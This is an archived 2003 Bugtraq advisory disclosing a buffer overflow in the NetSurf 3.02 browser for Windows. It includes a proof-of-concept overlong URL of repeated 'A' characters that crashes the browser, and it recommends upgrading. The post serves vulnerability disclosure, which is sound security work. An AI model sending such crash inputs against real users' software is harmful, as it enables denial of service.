[31110] in bugtraq
Buffer Overflow in NetSurf 3.02
daemon@ATHENA.MIT.EDU (=?koi8-r?Q?=22?=nimber=?koi8-r?Q?=)
Mon Aug 11 15:43:31 2003
From: =?koi8-r?Q?=22?=nimber=?koi8-r?Q?=22=20?= <nimber@mail.ru>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Date: Mon, 11 Aug 2003 22:26:23 +0400
In-Reply-To: <200308102316.h7ANGiB8010393@novappc.com>
Reply-To: =?koi8-r?Q?=22?=nimber=?koi8-r?Q?=22=20?= <nimber@mail.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id: <E19mHN9-000Hp2-00.nimber-mail-ru@f17.mail.ru>
#################################
# ZUD SECURITY TEAM PRESENT #
################################
# bug found by nimber #
# Email : nimber@designer.ru #
# Site: www.zudteam.org #
# HomePage: www.nimber.plux.ru #
# 7.08.2003 #
################################
Application: NetSurf
Versions: 3.02 (and all?)
Platform: Windows
Web Site: www.klodware.narod.ru
www.klodware.nm.ru
Bug: Buffer Overflow.
Exploit(exaple):
Crash browser by sending long http request.
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#################################
#Fix: Download new version. #
################################
